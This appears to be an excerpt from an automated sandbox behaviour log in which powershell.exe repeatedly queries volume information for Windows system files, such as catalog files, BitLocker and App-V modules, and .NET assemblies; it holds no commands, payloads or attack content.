Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
